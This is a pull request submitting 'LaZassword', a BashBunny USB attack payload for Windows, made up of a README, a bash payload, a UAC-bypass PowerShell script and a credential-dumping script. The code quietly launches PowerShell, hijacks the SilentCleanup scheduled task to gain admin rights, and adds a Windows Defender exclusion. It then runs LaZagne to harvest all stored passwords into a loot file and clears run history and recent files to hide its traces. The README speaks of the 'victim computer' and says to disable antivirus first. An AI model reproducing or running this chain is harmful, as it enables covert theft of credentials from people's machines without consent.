### PR TITLE
Add LaZassword payload

### DIFF
--- a/payloads/library/credentials/LaZassword/README.md
+++ b/payloads/library/credentials/LaZassword/README.md
@@ -1,0 +1,40 @@
+# LaZassword
+Password recovery payload for the BashBunny, using LaZagne.
+
+• Author: kuyaya
+
+• Firmware support: I tested it for 1.6, but it should work for all firmwares
+
+• Target: Windows
+
+• Creds: [PoSHMagiC0de](https://github.com/PoSHMagiC0de)
+
+## Description
+The payload uses powershell to bypass the AV and stores the output of lazagne (runned as admin) in a lootfile.
+
+Payload running time: ~ 1 minute
+
+You can rely on the LED FINISH. You don't have to do anything on the victim computer, as long as he has Windows Defender as the AV. No keyboard change, no safe eject, just plug it in, wait for the LED FINISH, plug it out.
+
+Only works with Windows Defender as victim AV.
+
+The BashBunny ejects itself. You don't have to do anything.
+
+## Configuration
+You need to download the latest version of LaZagne from the [release page of LaZagne](https://github.com/AlessandroZ/LaZagne/releases).
+
+Be sure to temporarily disable the AV so it doesn't get removed during download and installation. Then make a Zip-file (not 7zip or rar, just the normal zip format that windows provides) out of it, and place it in the /root folder of the Bunny.
+Example: 
+> G:\lazagne.zip\lazagne.exe
+
+Then just copy-paste the payload.txt and the lazassword.ps1 into one of the switch folders. (Doesn't matter if switch1 or switch2)
+
+***Be sure to change the DUCKY_LANG in the payload.txt***
+
+***Be sure to change the "administrators" in bypass.ps1 on line 42***
+Change it to "administrators" in your language. Example: German people should replace it by "Administratoren".
+
+If you have an idea on how to improve the payload or if you have an issue (e.g. the payload itself is not working) don't hesitate to PM me by E-Mail or at the [Hak5 Forums](https://forums.hak5.org/profile/63440-kuyaya/).
+
+## Latest update information
+Adding the ability to bypass UAC. Creds go to PoSHMagiC0de.

--- a/payloads/library/credentials/LaZassword/bypass.ps1
+++ b/payloads/library/credentials/LaZassword/bypass.ps1
@@ -1,0 +1,96 @@
+function Invoke-TaskCleanerBypass {
+    [CmdletBinding()]
+    Param(
+        [Parameter(Mandatory=$true,Position=0)]
+        [ValidateSet("Encoded","File")]
+        [string]$Method,
+        [Parameter(Mandatory=$false)]
+        [switch]$Hide
+    )
+
+    DynamicParam {
+        if($Method -eq "File") {
+            $paramname = "FileName"            
+        } else {
+            $paramname = "EncodedCommand"
+        }
+        #create a new ParameterAttribute Object
+        $MethodAttribute = New-Object System.Management.Automation.ParameterAttribute
+        #$testaddAttribute.Position = 3
+        $MethodAttribute.Mandatory = $true
+        #$MethodAttribute.HelpMessage = "My test help message"
+
+        #create an attributecollection object for the attribute we just created.
+        $attributeCollection = new-object System.Collections.ObjectModel.Collection[System.Attribute]
+
+        #add our custom attribute
+        $attributeCollection.Add($MethodAttribute)
+
+        #add our paramater specifying the attribute collection
+        $MethodParam = New-Object System.Management.Automation.RuntimeDefinedParameter($paramname, [string], $attributeCollection)
+
+        #expose the name of our parameter
+        $paramDictionary = New-Object System.Management.Automation.RuntimeDefinedParameterDictionary
+        $paramDictionary.Add($paramname, $MethodParam)
+        return $paramDictionary
+    }
+
+    
+
+    Process {
+        #If not in the Administrators group, do not run.
+        if(!(gwmi -class win32_groupuser | Where {$_.GroupComponent -match "Administrators" -and $_.PartComponent -match $env:username})) {
+            Return
+        }
+        #If not Windows 8.1 or higher then exit.
+        $OSV = (gwmi -class win32_operatingsystem -Property Version).Version -split "\."
+        if(!(($OSV[0] -ge 10) -or ($OSV[0] -eq 6 -and $OSV[1] -eq 3))){
+            Return
+        }
+
+        #Set Variables
+        if($Method -eq "File") {
+            $File = $PSBoundParameters.Filename
+            Try {
+                $File = (Resolve-Path $File).Path
+            } catch {
+                Return
+            }
+        } else {
+            $EncodedCommand = $PSBoundParameters.EncodedCommand
+        }
+
+        $regpath = "HKCU:\Environment"
+        $key = "windir"
+        $taskrunner = "schtasks" 
+        $taskparam = "/run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"
+        $waittime = 5
+        $cmd = "powershell "
+        if($Hide) {
+            $cmdparams = "/Noni /NoP /W h /E "
+        } else {
+            $cmdparams = "/Noni /NoP /E "
+        }
+
+
+
+        if($Method -eq "File") {
+            $tmpsc = "iex (gc -path `"$File`" -Raw)"
+            $encode = [System.Convert]::ToBase64String(([System.Text.Encoding]::Unicode.GetBytes($tmpsc)))
+            $cmdparams += "`"$encode`""
+        } else {
+            $cmdparams += "`"$encodedcommand`""
+        }
+
+        if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator') -or (([Environment]::UserName).ToLower() -eq "system")) {
+            Start-Process ($cmd.Trim()) -ArgumentList $cmdparams
+        } else {
+            Set-ItemProperty -Path $regpath -Name $key -Value ("cmd /c" + $cmd + $cmdparams + "& ::")
+            Start-Process $taskrunner -ArgumentList $taskparam
+            Start-Sleep -s $waittime
+            Remove-ItemProperty -Path $regpath -Name $key -Force | Out-Null
+        }
+    }
+}
+$currentdir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition)
+Invoke-TaskCleanerBypass -Method File -Filename $currentdir\lazassword.ps1 -hide

--- a/payloads/library/credentials/LaZassword/lazassword.ps1
+++ b/payloads/library/credentials/LaZassword/lazassword.ps1
@@ -1,0 +1,22 @@
+$BLABEL = (gwmi -class win32_volume -f {label = "BASHBUNNY"}).DriveLetter
+Add-MpPreference -ExclusionPath "$BLABEL"
+Expand-Archive -Force $BLABEL\lazagne.zip $BLABEL\lazagne
+$LPATH = & $BLABEL\lazagne\lazagne.exe all -vv
+$ipV4 = Test-Connection -ComputerName (hostname) -Count 1  | Select IPV4Address
+$tar_hostname = hostname
+mkdir $BLABEL\loot\LaZassword
+$LOOTFILE = "$BLABEL\loot\LaZassword\$ipV4$tar_hostname.txt"
+$LPATH | Out-File -FilePath $LOOTFILE
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+Remove-Item "$BLABEL\lazagne\" -recurse
+Remove-MpPreference -ExclusionPath "$BLABEL"
+New-Item -Path "$BLABEL\loot\LaZassword\done" -ItemType File 
+stop-process -Name explorer
+Get-ChildItem -Path C:\Users\\$env:UserName\AppData\Roaming\Microsoft\Windows\Recent -Include * -File -Recurse | foreach { $_.Delete()}
+$bb = (gwmi win32_volume -f 'label=''BASHBUNNY''').Name
+$driveEject = New-Object -comObject Shell.Application
+$COUNT=1
+while ($COUNT -ne 5){
+$driveEject.Namespace(17).ParseName("$bb").InvokeVerb("Eject")
+$COUNT++
+}

--- a/payloads/library/credentials/LaZassword/payload.txt
+++ b/payloads/library/credentials/LaZassword/payload.txt
@@ -1,0 +1,34 @@
+#!/bin/bash
+#
+# Title: LaZassword
+# Author: kuyaya
+# Version: 1.1
+
+# Check readiness & prepare environment
+LED SETUP
+ATTACKMODE HID STORAGE
+
+# Ensure loot is available for saving results.
+mount -o sync /dev/nandf /root/udisk/
+
+# Setup
+DUCKY_LANG=ch
+GET SWITCH_POSITION
+GET TARGET_HOSTNAME 
+
+# Attack
+LED ATTACK
+
+# Run lazassword.ps1 as admin
+RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\bypass.ps1')"
+
+# Wait until passwords are grabbed
+while [ ! -f /root/udisk/loot/LaZassword/done ]
+do
+LED ATTACK
+done
+
+# Finish
+# The remove of the file is necessary. Else, the loop wouldn't work.
+rm /root/udisk/loot/LaZassword/done
+LED FINISH


### PR DESCRIPTION
LaZassword is a payload that tricks Windows Defender, bypasses UAC and grabs passwords using LaZagne runned as admin. I already made a topic in the Hak5 forums and I've already made many improvements. This payload has many things that the [password grabber payload by jdebetaz](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber) doesn't has, I think it's worth it to publish it to the official hak5 bashbunny-payload repository. It is also on [my github](https://github.com/githubkuyaya/LaZassword) of course. I would love to see it published!
Regards, kuyaya